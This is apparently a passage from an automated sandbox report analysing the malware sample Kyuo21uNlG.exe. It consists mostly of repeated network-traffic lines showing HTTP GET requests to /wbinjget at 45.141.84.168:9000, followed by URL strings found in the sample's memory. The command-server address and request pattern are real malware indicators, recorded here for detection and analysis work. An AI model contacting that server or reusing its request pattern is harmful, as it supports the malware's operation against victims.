                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: Kyuo21uNlG.exe, 00000000.00000002.4125805350.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.141.84.168:9000
                  Source: Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002892000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.141.84.168:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08
                  Source: Kyuo21uNlG.exe, 00000000.00000002.4125805350.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002ADB000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002B38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002ADB000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002B38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002ADB000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002B38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
